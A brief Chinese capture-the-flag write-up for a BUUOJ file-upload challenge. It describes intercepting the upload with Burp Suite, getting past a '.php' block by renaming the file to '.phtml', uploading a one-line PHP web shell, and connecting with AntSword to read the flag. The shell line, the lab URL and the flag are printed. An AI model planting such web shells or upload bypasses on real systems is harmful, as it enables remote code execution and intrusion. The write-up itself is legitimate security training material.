文章目录
一、检查源代码
拿到题目之后,我们首先对页面源代码就行检查,源代码查看之后并没有发现提示或者有用线索,所以我们只能回到文件上传中找答案。
二、文件上传
1、先尝试图片是否能够上传
首先,我们尝试上传一张图片,发现图片上传成功
2、burpsuit抓包、改包
注:这是我准备的一句话木马,用来上传图片的<script language='php'>eval($_POST['a']);</script>
当我们把上传图片后缀名改为PHP是,网页右上角显示了nonono~ Bad file!所以我们把文件后缀名改为phtml上传,文件上传成功。
3、使用antsword进行连接,获取flag
http://a1fb3d86-c636-4d5a-a7b3-2cfbe8bd466b.node4.buuoj.cn/uplo4d/ad898f6bf1eda88f1ca04a806209e28d.phtml
flag{bbd330b4-4ce9-4e11-9614-2de4ce5865b0}
注:2021/10/28